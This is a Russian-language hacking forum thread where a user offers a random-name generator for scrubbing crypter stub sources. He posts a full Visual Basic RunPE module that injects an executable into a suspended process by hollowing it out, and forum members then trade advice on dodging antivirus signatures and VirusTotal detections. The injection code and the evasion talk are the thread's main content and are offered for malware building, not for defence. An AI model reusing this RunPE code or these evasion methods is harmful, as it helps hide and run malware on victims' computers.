Random string generator by KpunTokoT

[KpunTokoT]

Написал для удобства замены значений в коде.



Язык: VisualBasic .NET
Требуется: NET Framework 3

Как пользоваться:
Запускаем, выбираем число символов (по умолчанию 10), выбираем язык символов (по умолчанию EN), жмем Rnd - сгенерированное значение автоматически скопируется в буфер обмена.

Скан:

Название файла: Random.exe
Размер файла: 311296 байт
Дата сканирования: Sun, 08 Jun 14 08:37:26 -0400
MD5-хэш файла: e2d4e226903c70244b22875f43fd23d8

Результат: 0 из 38

Ad-Aware: OK
AhnLab V3 Internet Security: OK
ArcaVir: OK
Avast: OK
AVG: OK
Avira: OK
Bitdefender/BullGuard: OK
BullGuard Internet Security 2013: OK
ClamAV (UNIX version): OK
Comodo: OK
Dr.Web: OK
Emsisoft Anti-Malware (a-squared Anti-Malware): OK
eScan Internet Security Suite 14: OK
Fortinet 5: OK
F-Prot: OK
F-Secure 2014: OK
G Data: OK
IKARUS: OK
Immunet: OK
K7 Ultimate: OK
Kaspersky Internet Security 2014: OK
McAfee Total Protection 2013: OK
Microsoft Security Essentials: OK
NANO: OK
NOD32: OK
Norman: OK
Norton Internet Security: OK
Outpost Security Suite Pro 8.0: OK
Panda Antivirus: OK
Quick Heal: OK
Sophos: OK
SUPERAntiSpyware: OK
Total Defense Internet Security: OK
Trendmicro Titanium Internet Security: OK
Twister Antivirus 8: OK
VBA: OK
VIPRE Internet Security 2013: OK
Virit: OK

Scan report generated by Scanner.FuckAV.ru

[Ссылки могут видеть только зарегистрированные пользователи.]

Пароль на архив:

Скрытый текст

KpunTokoT

[Graxcon]

Цитата:

Сообщение от KpunTokoT

Язык: VisualBasic .NET

Охуеть

Цитата:

Сообщение от KpunTokoT

Random string generator

Охуеть #2

Полезность программки прямо зашкаливает

[KpunTokoT]

Если бы Вам, уважаемый Graxcon приходилось когда - либо чистить исходники стабов с огромным колличеством переменных:
Это только один модуль!!! RunPE Module:

Код:

Const SIZE_OF_80387_REGISTERS = 80

Type FLOATING_SAVE_AREA
ControlWord As Long
StatusWord As Long
TagWord As Long
ErrorOffset As Long
ErrorSelector As Long
DataOffset As Long
DataSelector As Long
RegisterArea(1 To SIZE_OF_80387_REGISTERS) As Byte
Cr0NpxState As Long
End Type

Public Type CONTEXT86
ContextFlags As Long
'These are selected by CONTEXT_DEBUG_REGISTERS
Dr0 As Long
Dr1 As Long
Dr2 As Long
Dr3 As Long
Dr6 As Long
Dr7 As Long
'These are selected by CONTEXT_FLOATING_POINT
FloatSave As FLOATING_SAVE_AREA
'These are selected by CONTEXT_SEGMENTS
SegGs As Long
SegFs As Long
SegEs As Long
SegDs As Long
'These are selected by CONTEXT_INTEGER
Edi As Long
Esi As Long
Ebx As Long
Edx As Long
Ecx As Long
Eax As Long
'These are selected by CONTEXT_CONTROL
Ebp As Long
Eip As Long
SegCs As Long
EFlags As Long
Esp As Long
SegSs As Long
End Type

Public Const CONTEXT_X86 = &H10000
Public Const CONTEXT86_CONTROL = (CONTEXT_X86 Or &H1) 'SS:SP, CS:IP, FLAGS, BP
Public Const CONTEXT86_INTEGER = (CONTEXT_X86 Or &H2) 'AX, BX, CX, DX, SI, DI
Public Const CONTEXT86_SEGMENTS = (CONTEXT_X86 Or &H4) 'DS, ES, FS, GS
Public Const CONTEXT86_FLOATING_POINT = (CONTEXT_X86 Or &H8) '387 state
Public Const CONTEXT86_DEBUG_REGISTERS = (CONTEXT_X86 Or &H10) 'DB 0-3,6,7
Public Const CONTEXT86_FULL = (CONTEXT86_CONTROL Or CONTEXT86_INTEGER Or CONTEXT86_SEGMENTS)

Public Declare Function GetThreadContext Lib "kernel32" (ByVal hThread As Long, lpContext As CONTEXT86) As Long
Public Declare Function SetThreadContext Lib "kernel32" (ByVal hThread As Long, lpContext As CONTEXT86) As Long
Public Declare Function SuspendThread Lib "kernel32" (ByVal hThread As Long) As Long
Public Declare Function ResumeThread Lib "kernel32" (ByVal hThread As Long) As Long
'========Process creation and memory access staff=========
Public Type PROCESS_INFORMATION
hProcess As Long
hThread As Long
dwProcessID As Long
dwThreadID As Long
End Type

Public Type STARTUPINFO
cb As Long
lpReserved As String
lpDesktop As String
lpTitle As String
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Long 'LPBYTE
hStdInput As Long
hStdOutput As Long
hStdError As Long
End Type

Public  Declare Function CreateProcess Lib "kernel32" Alias "CreateProcessA"  (ByVal lpAppName As String, ByVal lpCommandLine As String, ByVal  lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal  bInheritHandles As Long, ByVal dwCreationFlags As Long, ByVal  lpEnvironment As Long, ByVal lpCurrentDirectory As Long, lpStartupInfo  As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Public Declare Function ZwUnmapViewOfSection Lib "NTDLL.DLL" (ByVal hProcess As Long, ByVal BaseAddress As Long) As Long
Public  Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As  Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long,  lpNumberOfBytesWritten As Long) As Long
Public Declare Function  ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress  As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As  Long) As Long
Public Declare Function VirtualAllocEx Lib "kernel32"  (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long,  ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Public  Declare Function VirtualProtectEx Lib "kernel32" (ByVal hProcess As  Long, lpAddress As Any, ByVal dwSize As Long, ByVal flNewProtect As  Long, lpflOldProtect As Long) As Long
Public Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long

Public Const CREATE_SUSPENDED = &H4
Public Const MEM_COMMIT As Long = &H1000&
Public Const MEM_RESERVE As Long = &H2000&
Public Const PAGE_NOCACHE As Long = &H200
Public Const PAGE_EXECUTE_READWRITE As Long = &H40
Public Const PAGE_EXECUTE_WRITECOPY As Long = &H80
Public Const PAGE_EXECUTE_READ As Long = &H20
Public Const PAGE_EXECUTE As Long = &H10
Public Const PAGE_READONLY As Long = &H2
Public Const PAGE_WRITECOPY As Long = &H8
Public Const PAGE_NOACCESS As Long = &H1
Public Const PAGE_READWRITE As Long = &H4

'========Main staff for any API code :)===========
Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Dest As Any, src As Any, ByVal L As Long)
'==========PE staff==============
Private Enum ImageSignatureTypes
IMAGE_DOS_SIGNATURE = &H5A4D ''\\ MZ
IMAGE_OS2_SIGNATURE = &H454E ''\\ NE
IMAGE_OS2_SIGNATURE_LE = &H454C ''\\ LE
IMAGE_VXD_SIGNATURE = &H454C ''\\ LE
IMAGE_NT_SIGNATURE = &H4550 ''\\ PE00
End Enum

Private Type IMAGE_DOS_HEADER
e_magic As Integer ' Magic number
e_cblp As Integer ' Bytes on last page of file
e_cp As Integer ' Pages in file
e_crlc As Integer ' Relocations
e_cparhdr As Integer ' Size of header in paragraphs
e_minalloc As Integer ' Minimum extra paragraphs needed
e_maxalloc As Integer ' Maximum extra paragraphs needed
e_ss As Integer ' Initial (relative) SS value
e_sp As Integer ' Initial SP value
e_csum As Integer ' Checksum
e_ip As Integer ' Initial IP value
e_cs As Integer ' Initial (relative) CS value
e_lfarlc As Integer ' File address of relocation table
e_ovno As Integer ' Overlay number
e_res(0 To 3) As Integer ' Reserved words
e_oemid As Integer ' OEM identifier (for e_oeminfo)
e_oeminfo As Integer ' OEM information; e_oemid specific
e_res2(0 To 9) As Integer ' Reserved words
e_lfanew As Long ' File address of new exe header
End Type

' MSDOS File header
Private Type IMAGE_FILE_HEADER
Machine As Integer
NumberOfSections As Integer
TimeDateStamp As Long
PointerToSymbolTable As Long
NumberOfSymbols As Long
SizeOfOptionalHeader As Integer
Characteristics As Integer
End Type

' Directory format.
Private Type IMAGE_DATA_DIRECTORY
VirtualAddress As Long
Size As Long
End Type

' Optional header format.
Const IMAGE_NUMBEROF_DIRECTORY_ENTRIES = 16

Private Type IMAGE_OPTIONAL_HEADER
' Standard fields.
Magic As Integer
MajorLinkerVersion As Byte
MinorLinkerVersion As Byte
SizeOfCode As Long
SizeOfInitializedData As Long
SizeOfUnitializedData As Long
AddressOfEntryPoint As Long
BaseOfCode As Long
BaseOfData As Long
' NT additional fields.
ImageBase As Long
SectionAlignment As Long
FileAlignment As Long
MajorOperatingSystemVersion As Integer
MinorOperatingSystemVersion As Integer
MajorImageVersion As Integer
MinorImageVersion As Integer
MajorSubsystemVersion As Integer
MinorSubsystemVersion As Integer
W32VersionValue As Long
SizeOfImage As Long
SizeOfHeaders As Long
CheckSum As Long
Subsystem As Integer
DllCharacteristics As Integer
SizeOfStackReserve As Long
SizeOfStackCommit As Long
SizeOfHeapReserve As Long
SizeOfHeapCommit As Long
LoaderFlags As Long
NumberOfRvaAndSizes As Long
DataDirectory(0 To IMAGE_NUMBEROF_DIRECTORY_ENTRIES - 1) As IMAGE_DATA_DIRECTORY
End Type

Private Type IMAGE_NT_HEADERS
Signature As Long
FileHeader As IMAGE_FILE_HEADER
OptionalHeader As IMAGE_OPTIONAL_HEADER
End Type

' Section header
Const IMAGE_SIZEOF_SHORT_NAME = 8

Private Type IMAGE_SECTION_HEADER
SecName As String * IMAGE_SIZEOF_SHORT_NAME
VirtualSize As Long
VirtualAddress As Long
SizeOfRawData As Long
PointerToRawData As Long
PointerToRelocations As Long
PointerToLinenumbers As Long
NumberOfRelocations As Integer
NumberOfLinenumbers As Integer
Characteristics As Long
End Type

'=============Code================
Const OFFSET_4 = 4294967296#
Private Type OPENFILENAME 'Open & Save Dialog
lStructSize As Long
hwndOwner As Long
hInstance As Long
lpstrFilter As String
lpstrCustomFilter As String
nMaxCustFilter As Long
nFilterIndex As Long
lpstrFile As String
nMaxFile As Long
lpstrFileTitle As String
nMaxFileTitle As Long
lpstrInitialDir As String
lpstrTitle As String
flags As Long
nFileOffset As Integer
nFileExtension As Integer
lpstrDefExt As String
lCustData As Long
lpfnHook As Long
lpTemplateName As String
End Type

Private Const OFN_OVERWRITEPROMPT = &H2
Private Const OFN_HIDEREADONLY = &H4
Private Const OFN_HELPBUTTON = &H10
Private Const OFN_ENABLEHOOK = &H20
Private Const OFN_ENABLETEMPLATE = &H40
Private Const OFN_PATHMUSTEXIST = &H800
Private Const OFN_FILEMUSTEXISTS = &H1000
Private Const OFN_EXPLORER = &H80000
'OFN_EXPLORER OR OFN_FILEMUSTEXISTS
Private Const OFN_OPENFLAGS = &H81000
'OFN_OPENFLAGS OR OFN_OVERWRITEPROMPT AND NOT OFN_FILEMUSTEXIST
Private Const OFN_SAVEFLAGS = &H80002


Public Const MAX_PATH = 260
Private Declare Function GetOpenFileName Lib "comdlg32.dll" Alias "GetOpenFileNameA" (pOpenfilename As OPENFILENAME) As Long
Private Declare Function GetSaveFileName Lib "comdlg32.dll" Alias "GetSaveFileNameA" (pOpenfilename As OPENFILENAME) As Long

Public  Function GetFileName2(Optional ByVal sFileName As String, Optional  ByVal sFilter As String, Optional ByVal sTitle As String, Optional bOpen  As Boolean = True) As String
Dim OFN As OPENFILENAME
Dim ret As Long
Dim sExt As String
With OFN
.lStructSize = Len(OFN)
For i = 1 To Len(sFilter)
If Mid(sFilter, i, 1) = "|" Then
Mid(sFilter, i, 1) = vbNullChar
End If
Next
sFilter = sFilter & String$(2, 0)
.lpstrFilter = sFilter
.lpstrTitle = sTitle
.lpstrInitialDir = App.Path
.hInstance = App.hInstance
.lpstrFile = sFileName & String(MAX_PATH - Len(sFileName), 0)
.lpstrFileTitle = String(MAX_PATH, 0)
.nMaxFile = MAX_PATH
End With
If bOpen Then
OFN.flags = OFN.flags Or OFN_OPENFLAGS
ret = GetOpenFileName(OFN)
Else
OFN.flags = OFN.flags Or OFN_SAVEFLAGS
ret = GetSaveFileName(OFN)
End If
If ret Then GetFileName2 = TrimNull(OFN.lpstrFile)
End Function

Public Function TrimNull(startstr As String) As String
Dim pos As Integer
pos = InStr(startstr, Chr$(0))
If pos Then
TrimNull = Left$(startstr, pos - 1)
Exit Function
End If
TrimNull = startstr
End Function



Public Function RunExe(ByVal sVictim As String, abExeFile() As Byte, Optional hidden As String) As Long
Dim idh As IMAGE_DOS_HEADER
Dim inh As IMAGE_NT_HEADERS
Dim ish As IMAGE_SECTION_HEADER
Dim pi As PROCESS_INFORMATION
Dim si As STARTUPINFO
Dim context As CONTEXT86
Dim ImageBase As Long, ret As Long, i As Long
Dim addr As Long, lOffset As Long

CopyMemory idh, abExeFile(0), Len(idh)

CopyMemory inh, abExeFile(idh.e_lfanew), Len(inh)

If hidden = "1" Then
si.dwFlags = &H1
End If

si.cb = Len(si)
Call CreateProcess(vbNullString, sVictim, 0, 0, False, CREATE_SUSPENDED, 0, 0, si, pi)

context.ContextFlags = CONTEXT86_INTEGER
If GetThreadContext(pi.hThread, context) = 0 Then GoTo ClearProcess
Call ReadProcessMemory(pi.hProcess, ByVal context.Ebx + 8, addr, 4, 0)
If addr = 0 Then GoTo ClearProcess
If ZwUnmapViewOfSection(pi.hProcess, addr) Then GoTo ClearProcess
ImageBase  = VirtualAllocEx(pi.hProcess, ByVal inh.OptionalHeader.ImageBase,  inh.OptionalHeader.SizeOfImage, MEM_RESERVE Or MEM_COMMIT,  PAGE_READWRITE)
If ImageBase = 0 Then GoTo ClearProcess

Call WriteProcessMemory(pi.hProcess, ByVal ImageBase, abExeFile(0), inh.OptionalHeader.SizeOfHeaders, ret)
lOffset = idh.e_lfanew + Len(inh)
For i = 0 To inh.FileHeader.NumberOfSections - 1
CopyMemory ish, abExeFile(lOffset + i * Len(ish)), Len(ish)
Call  WriteProcessMemory(pi.hProcess, ByVal ImageBase + ish.VirtualAddress,  abExeFile(ish.PointerToRawData), ish.SizeOfRawData, ret)
Call VirtualProtectEx(pi.hProcess, ByVal ImageBase + ish.VirtualAddress, ish.VirtualSize, Protect(ish.Characteristics), addr)
Next i

Call WriteProcessMemory(pi.hProcess, ByVal context.Ebx + 8, ImageBase, 4, ret)
context.Eax = ImageBase + inh.OptionalHeader.AddressOfEntryPoint
Call SetThreadContext(pi.hThread, context)

Call ResumeThread(pi.hThread)
Exit Function
ClearProcess:
CloseHandle pi.hThread
CloseHandle pi.hProcess
End Function

Public Function Protect(ByVal Characteristics As Long) As Long
Dim mapping As Variant
mapping = Array(PAGE_NOACCESS, PAGE_EXECUTE, PAGE_READONLY, _
PAGE_EXECUTE_READ, PAGE_READWRITE, PAGE_EXECUTE_READWRITE, _
PAGE_READWRITE, PAGE_EXECUTE_READWRITE)
Protect = mapping(RShift(Characteristics, 29))
End Function

Public Function RShift(ByVal lValue As Long, ByVal lNumberOfBitsToShift As Long) As Long
RShift = vbLongToULong(lValue) / (2 ^ lNumberOfBitsToShift)
End Function

Public Function vbLongToULong(ByVal value As Long) As Double
If value < 0 Then
vbLongToULong = value + OFFSET_4
Else
vbLongToULong = value
End If
End Function

То я думаю, Вы бы поняли полезность данной программы...
А на .Net - ибо красиво!!!

[Graxcon]

Цитата:

Сообщение от KpunTokoT

А на .Net - ибо красиво!!!

ибо я кривой школьник и в школе нас учили только VB6

Цитата:

Сообщение от KpunTokoT

Graxcon приходилось когда - либо чистить исходники стабов

Да. SignDetect vazonez'a и отладчик - что может быть лучше, чем прибивать сигнатурки файлов, а не рерайтить переменные, а?

[KpunTokoT]

:-) :-) :-) когда я учился нас на информатике учили как современные ПК включать, которых у нас даже небыло, а стояли ЭВМы с перфорированными картами!!!
По мне я лучше исходный код изменю до неузноваемости, чем хекс, который будет с каждым днем ловить новые детекты из-за сливщиков на вт!!! ;-)

[Graxcon]

Цитата:

Сообщение от KpunTokoT

когда я учился нас на информатике учили как современные ПК включать

Пиздёж.

Цитата:

Сообщение от KpunTokoT

а стояли ЭВМы с перфорированными картами

В школах таких не было.

Цитата:

Сообщение от KpunTokoT

По мне я лучше исходный код изменю до неузноваемости

Потому что "Я ПЕШУ ТОКА НА БАЗИКЕ АЗМ УСТАРЕЛ И ОЧЕНЬ СЛОЖНЫЙ1!11!!"

Цитата:

Сообщение от KpunTokoT

чем хекс

ты конченный.

Цитата:

Сообщение от KpunTokoT

каждым днем ловить новые детекты

Почитай-ка по какому принципу детектят антивирусы. Явно не по названиям переменных в функциях, скрепткеда